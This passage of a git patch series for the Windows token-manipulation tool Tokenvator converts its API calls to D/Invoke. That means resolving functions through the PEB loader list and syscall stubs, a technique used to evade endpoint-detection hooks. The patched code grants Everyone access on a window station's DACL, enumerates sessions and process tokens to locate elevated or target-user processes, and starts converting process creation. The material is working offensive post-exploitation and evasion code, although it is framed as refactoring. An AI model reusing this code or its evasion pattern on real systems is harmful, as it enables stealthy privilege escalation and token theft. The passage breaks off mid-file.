             Console.WriteLine(" [+] Added Everyone to DACL : 0x{0}", newAcl.ToString("X4"));
+            #endregion
 
             ////////////////////////////////////////////////////////////////////////////////
-            status = advapi32.SetSecurityInfo(
-                handle,
-                Accctrl._SE_OBJECT_TYPE.SE_WINDOW_OBJECT,
-                Winnt.SECURITY_INFORMATION.DACL_SECURITY_INFORMATION,
-                ppsidOwner, ppsidGroup, newAcl, ppSacl
-            );
+            // advapi32.SetSecurityInfo(handle, Accctrl._SE_OBJECT_TYPE.SE_WINDOW_OBJECT, Winnt.SECURITY_INFORMATION.DACL_SECURITY_INFORMATION, ppsidOwner, ppsidGroup, newAcl, ppSacl);
+            ////////////////////////////////////////////////////////////////////////////////
+            #region SetEntriesInAclW
+            IntPtr hSetSecurityInfo = Generic.GetExportAddress(hadvapi32, "SetSecurityInfo");
+            MonkeyWorks.advapi32.SetSecurityInfo fSetSecurityInfo = (MonkeyWorks.advapi32.SetSecurityInfo)Marshal.GetDelegateForFunctionPointer(hSetSecurityInfo, typeof(MonkeyWorks.advapi32.SetSecurityInfo));
 
+            status = 0;
+            try
+            {
+                status = fSetSecurityInfo(
+                    handle,
+                    Accctrl._SE_OBJECT_TYPE.SE_WINDOW_OBJECT,
+                    Winnt.SECURITY_INFORMATION.DACL_SECURITY_INFORMATION,
+                    ppsidOwner, ppsidGroup, newAcl, ppSacl
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] SetSecurityInfo Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+           
             if (0 != status)
             {
                 Console.WriteLine(status);
                 Misc.GetWin32Error("SetSecurityInfo");
-                return;
+                return false;
             }
             Console.WriteLine(" [+] Applied DACL to Object");
+            #endregion
+
+            return true;
         }
 
+        /*
         /// <summary>
         /// 
         /// </summary>
@@ -259,8 +476,14 @@ internal void UpdateSecurityDacl(IntPtr hToken)
                 Trustee = trustee
             };
 
+            IntPtr lpOldACL = Marshal.AllocHGlobal(Marshal.SizeOf(oldACL));
+            Marshal.StructureToPtr(oldACL, lpOldACL, false);
+
             Winnt._ACL newACL = new Winnt._ACL();
-            uint retVal = advapi32.SetEntriesInAclW(1, ref explicitAccess, ref oldACL, ref newACL);
+            IntPtr lpNewAcl = Marshal.AllocHGlobal(Marshal.SizeOf(newACL));
+            Marshal.StructureToPtr(newACL, lpNewAcl, false);
+
+            uint retVal = advapi32.SetEntriesInAclW(1, ref explicitAccess, lpOldACL, ref lpNewAcl);
             if (0 != retVal)
             {
                 Misc.GetWin32Error("SetEntriesInAclW");
@@ -286,31 +509,7 @@ internal void UpdateSecurityDacl(IntPtr hToken)
                 return;
             }
             #endregion
-
-
-        }
-
-        /// <summary>
-        /// 
-        /// </summary>
-        public void Dispose()
-        {
-            if (IntPtr.Zero != ptrWinSta0)
-                Marshal.FreeHGlobal(ptrWinSta0);
-
-            if (IntPtr.Zero != pSid)
-                Marshal.FreeHGlobal(pSid);
-
-            if (IntPtr.Zero != ppSecurityDescriptor)
-                kernel32.LocalFree(ppSecurityDescriptor);
-        }
-
-        /// <summary>
-        /// 
-        /// </summary>
-        ~DesktopACL()
-        {
-            Dispose();
-        }
+        }        
+        */
     }
 }
diff --git a/Tokenvator/Plugins/Enumeration/UserSessions.cs b/Tokenvator/Plugins/Enumeration/UserSessions.cs
index fc202fc..1b4d205 100644
--- a/Tokenvator/Plugins/Enumeration/UserSessions.cs
+++ b/Tokenvator/Plugins/Enumeration/UserSessions.cs
@@ -4,37 +4,98 @@
 using System.Linq;
 using System.Management;
 using System.Runtime.InteropServices;
-using System.Text;
 
 using Tokenvator.Resources;
 using Tokenvator.Plugins.AccessTokens;
 
-using MonkeyWorks.Unmanaged.Headers;
-using MonkeyWorks.Unmanaged.Libraries;
+//using MonkeyWorks.Unmanaged.Headers;
+//using MonkeyWorks.Unmanaged.Libraries;
 
+using DInvoke.DynamicInvoke;
+using System.Runtime.ExceptionServices;
+using System.Security;
 
 namespace Tokenvator.Plugins.Enumeration
 {
-    class UserSessions
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
+    sealed class UserSessions
     {
         ////////////////////////////////////////////////////////////////////////////////
         // Lists interactive user sessions
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public static void EnumerateInteractiveUserSessions()
         {
+            IntPtr hwtsapi32 = Generic.GetPebLdrModuleEntry("wtsapi32.dll");
+            if (IntPtr.Zero == hwtsapi32)
+            {
+                hwtsapi32 = Generic.LoadModuleFromDisk("wtsapi32.dll");
+                if (IntPtr.Zero == hwtsapi32)
+                {
+                    Console.WriteLine("Unable to load wtsapi32.dll");
+                    return;
+                }
+            }
+
+            ////////////////////////////////////////////////////////////////////////////////
+            //wtsapi32.WTSEnumerateSessions(IntPtr.Zero, 0, 1, ref ppSessionInfo, ref pCount);
+            ////////////////////////////////////////////////////////////////////////////////
+
             Dictionary<string, uint> users = new Dictionary<string, uint>();
             IntPtr ppSessionInfo = new IntPtr();
-            int pCount = 0;
-            wtsapi32.WTSEnumerateSessions(IntPtr.Zero, 0, 1, ref ppSessionInfo, ref pCount);
+            uint pCount = 0;
+            
+            IntPtr hWTSEnumerateSessionsW = Generic.GetExportAddress(hwtsapi32, "WTSEnumerateSessionsW");
+            MonkeyWorks.wtsapi32.WTSEnumerateSessionsW fWTSEnumerateSessionsW = (MonkeyWorks.wtsapi32.WTSEnumerateSessionsW)Marshal.GetDelegateForFunctionPointer(hWTSEnumerateSessionsW, typeof(MonkeyWorks.wtsapi32.WTSEnumerateSessionsW));
+            
+            bool retVal = false;
+            try
+            {
+                retVal = fWTSEnumerateSessionsW(IntPtr.Zero, 0, 1, ref ppSessionInfo, ref pCount);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] IsWow64Proces Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return;
+            }
+
+            if (!retVal)
+            {
+                Misc.GetWin32Error("WTSEnumerateSessionsW");
+                return;
+            }
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // Iterate through the returned count
+            // wtsapi32.WTSQuerySessionInformationW(IntPtr.Zero, wtsSessionInfo.SessionId, wtsapi32._WTS_INFO_CLASS.WTSUserName, out ppBuffer, out pBytesReturned)
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hWTSQuerySessionInformationW = Generic.GetExportAddress(hwtsapi32, "WTSQuerySessionInformationW");
+            MonkeyWorks.wtsapi32.WTSQuerySessionInformationW fWTSQuerySessionInformationW = (MonkeyWorks.wtsapi32.WTSQuerySessionInformationW)Marshal.GetDelegateForFunctionPointer(hWTSQuerySessionInformationW, typeof(MonkeyWorks.wtsapi32.WTSQuerySessionInformationW));
+
             for (int i = 0; i < pCount; i++)
             {
-                IntPtr j = new IntPtr(ppSessionInfo.ToInt64() + (i * Marshal.SizeOf(typeof(wtsapi32._WTS_SESSION_INFO))));
-                wtsapi32._WTS_SESSION_INFO wtsSessionInfo = (wtsapi32._WTS_SESSION_INFO)Marshal.PtrToStructure(j, typeof(wtsapi32._WTS_SESSION_INFO));
+                IntPtr j = new IntPtr(ppSessionInfo.ToInt64() + (i * Marshal.SizeOf(typeof(MonkeyWorks.wtsapi32._WTS_SESSION_INFO))));
+                MonkeyWorks.wtsapi32._WTS_SESSION_INFO wtsSessionInfo = (MonkeyWorks.wtsapi32._WTS_SESSION_INFO)Marshal.PtrToStructure(j, typeof(MonkeyWorks.wtsapi32._WTS_SESSION_INFO));
                 IntPtr ppBuffer, pBytesReturned;
                 ppBuffer = pBytesReturned = IntPtr.Zero;
-                if (!wtsapi32.WTSQuerySessionInformationW(IntPtr.Zero, wtsSessionInfo.SessionId, wtsapi32._WTS_INFO_CLASS.WTSUserName, out ppBuffer, out pBytesReturned))
+
+                try
+                {
+                    retVal = fWTSQuerySessionInformationW(IntPtr.Zero, wtsSessionInfo.SessionId, MonkeyWorks.wtsapi32._WTS_INFO_CLASS.WTSUserName, ref ppBuffer, ref pBytesReturned);
+                }
+                catch (Exception ex)
                 {
-                    Console.WriteLine("[-] {0}", Marshal.GetLastWin32Error());
+                    Console.WriteLine("[-] WTSQuerySessionInformationW Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                    continue;
+                }
+
+                if (!retVal)
+                {
+                    Misc.GetWin32Error("WTSQuerySessionInformationW");
                     continue;
                 }
 
@@ -44,6 +105,8 @@ public static void EnumerateInteractiveUserSessions()
                     users.Add(userName, (uint)wtsSessionInfo.SessionId);
                 }
             }
+
+            Console.WriteLine();
             Console.WriteLine("{0,-30}{1,-30}", "User", "SessionID");
             Console.WriteLine("{0,-30}{1,-30}", "----", "---------");
             foreach (string name in users.Keys)
@@ -53,146 +116,95 @@ public static void EnumerateInteractiveUserSessions()
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Converts a TokenStatistics Pointer array to User Name
-        ////////////////////////////////////////////////////////////////////////////////
-        private static bool ConvertTokenStatisticsToUsername(Winnt._TOKEN_STATISTICS tokenStatistics, ref string userName)
-        {
-            IntPtr lpLuid = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(Winnt._LUID)));
-            Marshal.StructureToPtr(tokenStatistics.AuthenticationId, lpLuid, false);
-            if (IntPtr.Zero == lpLuid)
-            {
-                return false;
-            }
-
-            IntPtr ppLogonSessionData = new IntPtr();
-            if (0 != secur32.LsaGetLogonSessionData(lpLuid, out ppLogonSessionData))
-            {
-                Misc.GetWin32Error("LsaGetLogonSessionData");
-                return false;
-            }
-
-            if (IntPtr.Zero == ppLogonSessionData)
-            {
-                return false;
-            }
-
-            ntsecapi._SECURITY_LOGON_SESSION_DATA securityLogonSessionData = (ntsecapi._SECURITY_LOGON_SESSION_DATA)Marshal.PtrToStructure(ppLogonSessionData, typeof(ntsecapi._SECURITY_LOGON_SESSION_DATA));
-            if (IntPtr.Zero == securityLogonSessionData.Sid || IntPtr.Zero == securityLogonSessionData.UserName.Buffer || IntPtr.Zero == securityLogonSessionData.LogonDomain.Buffer)
-            {
-                return false;
-            }
-            
-            string usernameBuffer = Marshal.PtrToStringUni(securityLogonSessionData.UserName.Buffer);
-
-            if (Environment.MachineName+"$" == usernameBuffer && ConvertSidToName(securityLogonSessionData.Sid, out userName))
-            {
-                return true;
-
-            }
-
-            userName = string.Format("{0}\\{1}", Marshal.PtrToStringUni(securityLogonSessionData.LogonDomain.Buffer), usernameBuffer);
-            return true;
-        }
-
-        ////////////////////////////////////////////////////////////////////////////////
-        // Converts a SID Byte array to User Name
+        /// <summary>
+        /// Emulates tasklist /v
+        /// Borrowed from Sharpire
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// Not converting the WMI calls
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        internal static bool ConvertSidToName(IntPtr sid, out string userName)
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        internal static void Tasklist()
         {
-            StringBuilder sbUserName = new StringBuilder();
-
-            string lpSystemName = string.Empty;
-            StringBuilder lpName = new StringBuilder();
-            uint cchName = (uint)lpName.Capacity;
-            StringBuilder lpReferencedDomainName = new StringBuilder();
-            uint cchReferencedDomainName = (uint)lpReferencedDomainName.Capacity;
-            Winnt._SID_NAME_USE sidNameUse = new Winnt._SID_NAME_USE();
-            advapi32.LookupAccountSid(lpSystemName, sid, lpName, ref cchName, lpReferencedDomainName, ref cchReferencedDomainName, out sidNameUse);
-
-            lpName.EnsureCapacity((int)cchName + 1);
-            lpReferencedDomainName.EnsureCapacity((int)cchReferencedDomainName + 1);
+            ////////////////////////////////////////////////////////////////////////////////
+            // kernel32.IsWow64Process(process.Handle, out isWow64Process);
+            ////////////////////////////////////////////////////////////////////////////////
 
-            byte[] bsid = new byte[16];
-            Marshal.Copy(sid, bsid, 0, 16);
-            bool retVal = advapi32.LookupAccountSid(lpSystemName, sid, lpName, ref cchName, lpReferencedDomainName, ref cchReferencedDomainName, out sidNameUse);
+            IntPtr hKernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
+            IntPtr hIsWow64Process = Generic.GetExportAddress(hKernel32, "IsWow64Process");
+            MonkeyWorks.kernel32.IsWow64Process fIsWow64Process = (MonkeyWorks.kernel32.IsWow64Process)Marshal.GetDelegateForFunctionPointer(hIsWow64Process, typeof(MonkeyWorks.kernel32.IsWow64Process));
 
-            if (!retVal && 0 == lpName.Length)
-            {
-                Misc.GetWin32Error("LookupAccountSid");
-            }
-
-            if (lpReferencedDomainName.Length > 0)
-            {
-                sbUserName.Append(lpReferencedDomainName);
-            }
-
-            if (sbUserName.Length > 0)
-            {
-                sbUserName.Append(@"\");
-            }
-
-            if (lpName.Length > 0)
-            {
-                sbUserName.Append(lpName);
-            }
-
-            userName = sbUserName.ToString();
-
-            if (string.IsNullOrEmpty(userName))
-            {
-                return false;
-            }
-            else
-            {
-                return true;
-            }
-        }
+            Console.WriteLine("[*] Running");
 
-        ////////////////////////////////////////////////////////////////////////////////
-        // Borrowed from Sharpire
-        ////////////////////////////////////////////////////////////////////////////////
-        internal static void Tasklist()
-        {
+            ////////////////////////////////////////////////////////////////////////////////
+            // Query WMI for a list of all running processes and get's the process owner
+            ////////////////////////////////////////////////////////////////////////////////
             Dictionary<int, string> owners = new Dictionary<int, string>();
-            ManagementScope scope = new ManagementScope("\\\\.\\root\\cimv2");
+            ManagementScope scope = new ManagementScope(@"\\.\root\cimv2");
             scope.Connect();
             ObjectQuery query = new ObjectQuery("SELECT * FROM Win32_Process");
-            ManagementObjectSearcher objectSearcher = new ManagementObjectSearcher(scope, query);
-            ManagementObjectCollection objectCollection = objectSearcher.Get();
-            foreach (ManagementObject managementObject in objectCollection)
+            using (ManagementObjectSearcher objectSearcher = new ManagementObjectSearcher(scope, query))
             {
-                string name = "";
-                string[] owner = new string[2];
-                managementObject.InvokeMethod("GetOwner", (object[])owner);
-                if (owner[0] != null)
+                using (ManagementObjectCollection objectCollection = objectSearcher.Get())
                 {
-                    name = owner[1] + "\\" + owner[0];
-                }
-                else
-                {
-                    name = "N/A";
+                    foreach (ManagementObject managementObject in objectCollection)
+                    {
+                        Console.Write(".");
+                        string name = "";
+                        string[] owner = new string[2];
+                        try
+                        {
+                            managementObject.InvokeMethod("GetOwner", (object[])owner);
+                            if (owner[0] != null)
+                            {
+                                name = owner[1] + "\\" + owner[0];
+                            }
+                            else
+                            {
+                                name = "N/A";
+                            }
+                            managementObject.InvokeMethod("GetOwner", (object[])owner);
+                        }
+                        catch (Exception ex)
+                        {
+                            if (!ex.Message.Equals("Not found", StringComparison.OrdinalIgnoreCase))
+                            {
+                                Console.WriteLine("[-] InvokeMethod Generated an Exception");
+                                Console.WriteLine("[-] {0}", ex);
+                            }
+                            name = "N/A";
+                        }
+                        owners[Convert.ToInt32(managementObject["Handle"])] = name;
+                    }
                 }
-                managementObject.InvokeMethod("GetOwner", (object[])owner);
-                owners[Convert.ToInt32(managementObject["Handle"])] = name;
             }
+            Console.WriteLine();
 
+            ////////////////////////////////////////////////////////////////////////////////
+            // Get the list of processes and query if it is a x86 or x64 process
+            ////////////////////////////////////////////////////////////////////////////////
             List<string[]> lines = new List<string[]>();
             foreach (Process process in Process.GetProcesses())
             {
-                string architecture;
+                string architecture = "N/A";
                 int workingSet;
-                bool isWow64Process;
+                bool isWow64Process = false;
                 try
                 {
-                    kernel32.IsWow64Process(process.Handle, out isWow64Process);
+                    fIsWow64Process(process.Handle, ref isWow64Process);
                     if (isWow64Process)
                         architecture = "x64";
                     else
                         architecture = "x86";
                 }
-                catch (Exception)
+                catch (Exception ex)
                 {
-                    architecture = "N/A";
+                    if (!ex.Message.Equals("Access is denied", StringComparison.OrdinalIgnoreCase))
+                    {
+                        Console.WriteLine("[-] IsWow64Proces Generated an Exception");
+                        Console.WriteLine("[-] {0}", ex);
+                    }
                 }
                 workingSet = (int)(process.WorkingSet64 / 1000000);
 
@@ -202,9 +214,9 @@ internal static void Tasklist()
                     if (!owners.TryGetValue(process.Id, out userName))
                         userName = "False";
                 }
-                catch
+                catch (Exception ex)
                 {
-                    userName = "<Exception>";
+                    userName = ex.Message;
                 }
 
                 lines.Add(
@@ -219,13 +231,22 @@ internal static void Tasklist()
             }
             string[][] linesArray = lines.ToArray();
 
-            //https://stackoverflow.com/questions/232395/how-do-i-sort-a-two-dimensional-array-in-c
+            ////////////////////////////////////////////////////////////////////////////////
+            // Sort the data
+            // https://stackoverflow.com/questions/232395/how-do-i-sort-a-two-dimensional-array-in-c
+            ////////////////////////////////////////////////////////////////////////////////
+
             Comparer<int> comparer = Comparer<int>.Default;
-            Array.Sort<String[]>(linesArray, (x, y) => comparer.Compare(Convert.ToInt32(x[1]), Convert.ToInt32(y[1])));
+            Array.Sort<string[]>(linesArray, (x, y) => comparer.Compare(Convert.ToInt32(x[1]), Convert.ToInt32(y[1])));
 
+            ////////////////////////////////////////////////////////////////////////////////
+            // Print the sorted and formated information
+            ////////////////////////////////////////////////////////////////////////////////
             List<string> sortedLines = new List<string>();
             string[] headerArray = { "ProcessName", "PID", "Arch", "UserName", "MemUsage" };
             sortedLines.Add(string.Format("{0,-30} {1,-8} {2,-6} {3,-28} {4,8}", headerArray));
+            headerArray = new string[] { "-----------", "---", "----", "--------", "--------" };
+            sortedLines.Add(string.Format("{0,-30} {1,-8} {2,-6} {3,-28} {4,8}", headerArray));
             foreach (string[] line in linesArray)
             {
                 sortedLines.Add(string.Format("{0,-30} {1,-8} {2,-6} {3,-28} {4,8} M", line));
@@ -234,75 +255,53 @@ internal static void Tasklist()
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Finds a process per user discovered
+        /// <summary>
+        /// Finds a process per user discovered
+        /// </summary>
+        /// <param name="findElevation"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         public static Dictionary<string, uint> EnumerateTokens(bool findElevation)
         {
             Dictionary<string, uint> users = new Dictionary<string, uint>();
             foreach (Process p in Process.GetProcesses())
             {
-                IntPtr hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_LIMITED_INFORMATION, true, (uint)p.Id);
-                if (IntPtr.Zero == hProcess)
-                {
-                    continue;
-                }
-                IntPtr hToken;
-                if (!kernel32.OpenProcessToken(hProcess, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, out hToken))
-                {
-                    continue;
-                }
-                kernel32.CloseHandle(hProcess);
-                if (findElevation)
+                using (TokenInformation ti = new TokenInformation(IntPtr.Zero))
                 {
-                    using (TokenInformation ti = new TokenInformation(hToken))
+                    ti.OpenProcessToken(p.Id);
+                    ti.SetWorkingTokenToRemote();
+                    ti.GetTokenElevation(false);
+                    if (findElevation)
                     {
                         if (!ti.GetTokenElevation(false))
                         {
                             continue;
                         }
                     }
-                }
+                    string userName = ti.GetTokenUser(false);
 
-                uint dwLength = 0;
-                Winnt._TOKEN_STATISTICS tokenStatistics = new Winnt._TOKEN_STATISTICS();
-                //Split up impersonation and primary tokens
-                if (Winnt._TOKEN_TYPE.TokenImpersonation == tokenStatistics.TokenType)
-                {
-                    continue;
-                }
-
-                if (!advapi32.GetTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
-                {
-                    if (!advapi32.GetTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
+                    if (!users.ContainsKey(userName))
                     {
-                        Console.WriteLine("GetTokenInformation: {0}", Marshal.GetLastWin32Error());
-                        continue;
+                        users.Add(userName, (uint)p.Id);
                     }
                 }
-                kernel32.CloseHandle(hToken);
-
-                string userName = string.Empty;
-                if (!ConvertTokenStatisticsToUsername(tokenStatistics, ref userName))
-                {
-                    continue;
-                }
-
-                if (!users.ContainsKey(userName))
-                {
-                    users.Add(userName, (uint)p.Id);
-                }
             }
             return users;
         }
 
         /////////////////////////////////////////////////////////////////////////////
-        // Lists tokens via WMI
+        /// <summary>
+        /// Lists tokens via WMI
+        /// Could built in .Net Methods
+        /// No plans to convert
+        /// </summary>
+        /// <returns>Return a unique list of users on the system</returns>
         ////////////////////////////////////////////////////////////////////////////////
         public static Dictionary<string, uint> EnumerateTokensWMI()
         {
             Dictionary<string, uint> users = new Dictionary<string, uint>();
             List<ManagementObject> systemProcesses = new List<ManagementObject>();
-            ManagementScope scope = new ManagementScope("\\\\.\\root\\cimv2");
+            ManagementScope scope = new ManagementScope(@"\\.\root\cimv2");
             scope.Connect();
             if (!scope.IsConnected)
             {
@@ -333,66 +332,30 @@ public static Dictionary<string, uint> EnumerateTokensWMI()
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Find processes for a user via Tokens
+        /// <summary>
+        /// Find processes for a user via Tokens
+        /// Being phased out
+        /// P/Invokes removed and pulls from TokenInformation instead
+        /// </summary>
+        /// <param name="targetAccount"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        public static Dictionary<uint, string> EnumerateUserProcesses(bool findElevation, string targetAccount)
+        public static Dictionary<uint, string> EnumerateUserProcesses(string targetAccount)
         {
             Dictionary<uint, string> users = new Dictionary<uint, string>();
             Process[] pids = Process.GetProcesses();
             Console.WriteLine("[*] Examining {0} processes", pids.Length);
-            foreach (Process p in pids)
-            {
-                IntPtr hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_LIMITED_INFORMATION, true, (uint)p.Id);
-                if (IntPtr.Zero == hProcess)
-                {
-                    continue;
-                }
-                IntPtr hToken;
-                if (!kernel32.OpenProcessToken(hProcess, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, out hToken))
-                {
-                    continue;
-                }
-                kernel32.CloseHandle(hProcess);
 
-                if (findElevation)
-                {
-                    using (TokenInformation ti = new TokenInformation(hToken))
-                    { 
-                        if (!ti.GetTokenElevation(false))
-                        {
-                            continue;
-                        }
-                    }
-                }
-
-                uint dwLength = 0;
-                Winnt._TOKEN_STATISTICS tokenStatistics = new Winnt._TOKEN_STATISTICS();
-                if (!advapi32.GetTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
-                {
-                    if (!advapi32.GetTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
-                    {
-                        continue;
-                    }
-                }
-                kernel32.CloseHandle(hToken);
-
-                if (Winnt._TOKEN_TYPE.TokenImpersonation == tokenStatistics.TokenType)
-                {
-                    continue;
-                }
-
-
-                string userName = string.Empty;
-                if (!ConvertTokenStatisticsToUsername(tokenStatistics, ref userName))
-                {
-                    continue;
-                }
-                if (userName.Contains(targetAccount, StringComparison.OrdinalIgnoreCase))
+            using (TokenInformation ti = new TokenInformation(IntPtr.Zero))
+            {
+                foreach (Process p in pids)
                 {
-                    users.Add((uint)p.Id, p.ProcessName);
-                    if (findElevation)
+                    ti.OpenProcessToken(p.Id, false);
+                    ti.SetWorkingTokenToRemote();
+                    string userName = ti.GetTokenUser(false);
+                    if (userName.Contains(targetAccount, StringComparison.OrdinalIgnoreCase))
                     {
-                        return users;
+                        users.Add((uint)p.Id, p.ProcessName);
                     }
                 }
             }
@@ -408,7 +371,12 @@ public static Dictionary<uint, string> EnumerateUserProcesses(bool findElevation
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Find processes for user via WMI
+        /// <summary>
+        /// Find processes for user via WMI
+        /// Not converting the WMI calls
+        /// </summary>
+        /// <param name="userAccount"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
         public static Dictionary<uint, string> EnumerateUserProcessesWMI(string userAccount)
         {

From 21ba28aada26d9cc974f0018d6ddf6628a7e1daf Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Fri, 10 Sep 2021 11:37:53 -0500
Subject: [PATCH 18/36] Converted CreateProcess to DInvoke

---
 .../Plugins/AccessTokens/CreateTokens.cs      |  11 +-
 .../Plugins/AccessTokens/TokenInformation.cs  |  10 +-
 .../Plugins/AccessTokens/TokenManipulation.cs |   2 +-
 Tokenvator/Plugins/Execution/CreateProcess.cs | 196 +++++++++++++++---
 4 files changed, 177 insertions(+), 42 deletions(-)

diff --git a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
index b9ca7df..ccc87f7 100644
--- a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
@@ -768,11 +768,14 @@ ref globalEotalEntriesRead
 
             Console.WriteLine("[*] Adding Groups");
 
-            for (int i = 0; i < tokenGroups.GroupCount; i++)
+            using (TokenInformation ti = new TokenInformation(IntPtr.Zero))
             {
-                string sid, account;
-                TokenInformation.ReadSidAndName(tokenGroups.Groups[i].Sid, out sid, out account);
-                Console.WriteLine(" ({0}) {1,-20} {2}", i, sid, account);
+                for (int i = 0; i < tokenGroups.GroupCount; i++)
+                {
+                    string sid, account;
+                    ti.ReadSidAndName(tokenGroups.Groups[i].Sid, out sid, out account);
+                    Console.WriteLine(" ({0}) {1,-20} {2}", i, sid, account);
+                }
             }
 
             return true;
diff --git a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
index 67d8aff..eb97181 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
@@ -43,6 +43,7 @@ class TokenInformation : AccessTokens
         public List<string> Privileges { get; private set; }
 
         private readonly IntPtr hNtQueryInformationToken;
+        private readonly IntPtr hadvapi32;
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
@@ -53,6 +54,7 @@ class TokenInformation : AccessTokens
         public TokenInformation(IntPtr hToken) : base(hToken)
         {
             hNtQueryInformationToken = Generic.GetSyscallStub("NtQueryInformationToken");
+            hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
 
             Privileges = new List<string>();
         }
@@ -414,8 +416,6 @@ public void GetTokenPrivileges()
             ////////////////////////////////////////////////////////////////////////////////
             // Iterate through the return privileges
             ////////////////////////////////////////////////////////////////////////////////
-            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
-
             IntPtr hLookupPrivilegeNameW = Generic.GetExportAddress(hadvapi32, "LookupPrivilegeNameW");
             MonkeyWorks.advapi32.LookupPrivilegeNameW fLookupPrivilegeNameW = (MonkeyWorks.advapi32.LookupPrivilegeNameW)Marshal.GetDelegateForFunctionPointer(hLookupPrivilegeNameW, typeof(MonkeyWorks.advapi32.LookupPrivilegeNameW));
 
@@ -614,10 +614,8 @@ public void GetTokenDefaultDacl()
         /// <param name="sid"></param>
         /// <param name="account"></param>
         ////////////////////////////////////////////////////////////////////////////////
-        public static void ReadSidAndName(IntPtr pointer, out string sid, out string account)
+        public void ReadSidAndName(IntPtr pointer, out string sid, out string account)
         {
-            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
-
             IntPtr hConvertSidToStringSidW = Generic.GetExportAddress(hadvapi32, "ConvertSidToStringSidW");
             MonkeyWorks.advapi32.ConvertSidToStringSidW fConvertSidToStringSidW = (MonkeyWorks.advapi32.ConvertSidToStringSidW)Marshal.GetDelegateForFunctionPointer(hConvertSidToStringSidW, typeof(MonkeyWorks.advapi32.ConvertSidToStringSidW));
 
@@ -691,8 +689,6 @@ public bool CheckTokenPrivilege(string privilegeName)
                 Marshal.FreeHGlobal(lpTokenInformation);
             }
 
-            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
-
             IntPtr hLookupPrivilegeName = Generic.GetExportAddress(hadvapi32, "LookupPrivilegeNameW");
             MonkeyWorks.advapi32.LookupPrivilegeNameW fLookupPrivilegeName = (MonkeyWorks.advapi32.LookupPrivilegeNameW)Marshal.GetDelegateForFunctionPointer(hLookupPrivilegeName, typeof(MonkeyWorks.advapi32.LookupPrivilegeNameW));
 
diff --git a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
index 22facf0..72e2572 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
@@ -256,7 +256,7 @@ public void DisableTokenGroup(string group)
             string sid, account;
             for (int i = 0; i < ti.tokenGroups.GroupCount; i++) 
             {
-                TokenInformation.ReadSidAndName(ti.tokenGroups.Groups[i].Sid, out sid, out account);
+                ti.ReadSidAndName(ti.tokenGroups.Groups[i].Sid, out sid, out account);
                 if (string.Equals(group, account, StringComparison.OrdinalIgnoreCase))
                 {
                     ti.tokenGroups.Groups[i].Attributes ^= (uint)Winnt.SE_GROUP_ENABLED;
diff --git a/Tokenvator/Plugins/Execution/CreateProcess.cs b/Tokenvator/Plugins/Execution/CreateProcess.cs
index cb42428..07343d4 100644
--- a/Tokenvator/Plugins/Execution/CreateProcess.cs
+++ b/Tokenvator/Plugins/Execution/CreateProcess.cs
@@ -1,42 +1,82 @@
 using System;
+using System.Runtime.ExceptionServices;
 using System.Runtime.InteropServices;
+using System.Security;
 using System.Text;
 
 using Tokenvator.Resources;
 
 using DInvoke.DynamicInvoke;
 using MonkeyWorks.Unmanaged.Headers;
-using MonkeyWorks.Unmanaged.Libraries;
+//using MonkeyWorks.Unmanaged.Libraries;
 
 namespace Tokenvator.Plugins.Execution
 {
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
     static class CreateProcess
